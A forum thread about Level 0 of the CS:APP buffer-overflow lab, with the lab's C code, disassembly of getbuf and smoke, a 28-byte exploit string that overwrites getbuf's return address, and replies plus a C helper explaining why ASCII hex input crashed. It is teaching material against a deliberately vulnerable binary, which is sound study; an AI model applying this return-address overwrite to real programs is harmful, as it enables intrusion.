CS:APP (Computer Systems: A Programmer's Perspective) Lab 3: buffer overflow attack

zawdcxsa 2017-03-09 08:43:05
Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
 1 void test()
 2 {
 3     int val;
 4     volatile int local = 0xdeadbeef;
 5     entry_check(3); /* Make sure entered this function properly */
 6     val = getbuf();
 7     /* Check for corrupted stack */
 8     if (local != 0xdeadbeef) {
 9         printf("Sabotaged!: the stack has been corrupted\n");
10     }
11     else if (val == cookie) {
12         printf("Boom!: getbuf returned 0x%x\n", val);
13         validate(3);
14     }
15     else {
16         printf("Dud: getbuf returned 0x%x\n", val);
17     }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
    entry_check(0); /* Make sure entered this function properly */
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.

Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
As you can see: "Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test."
So the task is to change the address that getbuf returns to into the address of smoke.
Disassembly of getbuf:
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0 <Gets>
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret
You can see that buf sits 4+0x18 = 0x1c bytes below the return address, which is 28 in decimal, so the input needs 28 bytes of padding followed by the address of smoke.
Disassembly of smoke:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 <puts@plt>
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0 <validate>
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 <exit@plt>
The address of smoke is 08048eb0, and since this is a little-endian machine, I fill in:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
But no matter what I try it doesn't work; the output is:
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4


Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
I've been fiddling with this for a long time and still can't figure out where the problem is.

6 replies (shown newest first)

Oh, so there was a tool for it. Still, a little program like that is easy to write yourself; it's just atoi() or strtol()/strtoul().

zawdcxsa 2017-03-13
There is this file SENDSTRING: "A utility to help convert between string formats." Its job is to convert the hex text into the raw string.
1. You can set up a series of pipes to pass the string through SENDSTRING.
unix> cat exploit.txt | ./sendstring | ./bufbomb -t bovik
2. You can store the raw string in a file and use I/O redirection to supply it to BUFBOMB:
unix> ./sendstring < exploit.txt > exploit-raw.txt
(I used this line to convert the hex text 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08, i.e. text.txt, into the corresponding raw-string file text-raw.txt.)
unix> ./bufbomb -t bovik < exploit-raw.txt
This approach can also be used when running BUFBOMB from within GDB:
unix> gdb bufbomb
(gdb) run -t bovik < exploit-raw.txt
Original binary file: [screenshot]
The resulting string: [screenshot]
Feeding text-raw.txt to bufbomb in the console: you called smoke!

Create a file; the contents don't matter, just make sure it is at least 30 bytes. Then open it with a hex editor such as UltraEdit, switch to hex editing mode, write those 28 bytes in starting from offset 0, put 0d 0a after them, and save.

zawdcxsa 2017-03-13
Got it working!!!!! Hahahaha

zawdcxsa 2017-03-13
Then how should I write it?

Writing it in a text file like that, 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08, and feeding it to the program won't work. The program will treat what it reads as the sequence of characters 30 30 20 30 30 20 ...
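The last reply's point, as an added C example (not the lab's sendstring tool and not any poster's code): a converter that does what sendstring did for the poster, plus a check of which return address getbuf's ret actually sees at the 28-byte offset taken from the disassembly. EXPLOIT_TEXT is a constructed copy of the poster's text.txt; fed as ASCII, bytes 28..31 are "0 00", which decode to 0x30302030, the very address in the SIGSEGV message above, while after conversion the same slot holds 0x08048eb0, the address of smoke.

```c
/* hex2raw.c, an added example (not the lab's sendstring or any poster's code):
 * converts hex text such as "00 00 ... b0 8e 04 08" to raw bytes and shows
 * which return address getbuf's ret sees, using the offset from the disassembly. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define RET_OFFSET 28  /* buf at -0x18(%ebp), plus 4 bytes of saved %ebp */

/* Constructed copy of the poster's text.txt: 28 zero bytes, then smoke's address. */
const char *const EXPLOIT_TEXT =
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08\n";

/* Parse whitespace-separated two-digit hex tokens with strtoul (the conversion
 * sendstring performs). Returns the byte count, or 0 on a malformed token. */
size_t hex_text_to_bytes(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (;;) {
        text += strspn(text, " \t\r\n");
        if (!*text)
            return n;
        char *end;
        unsigned long v = strtoul(text, &end, 16);
        if (end - text != 2 || n >= cap)
            return 0;
        out[n++] = (unsigned char)v;
        text = end;
    }
}

/* Little-endian decode of the 4 input bytes that land on the saved return
 * address: this is where ret jumps once Gets has copied the input into buf. */
uint32_t return_address_seen(const unsigned char *input)
{
    const unsigned char *p = input + RET_OFFSET;
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Same, after converting the hex text to raw bytes first (0 on parse error). */
uint32_t return_address_after_conversion(const char *text)
{
    unsigned char raw[64];
    size_t n = hex_text_to_bytes(text, raw, sizeof raw);
    return n >= (size_t)RET_OFFSET + 4 ? return_address_seen(raw) : 0;
}
```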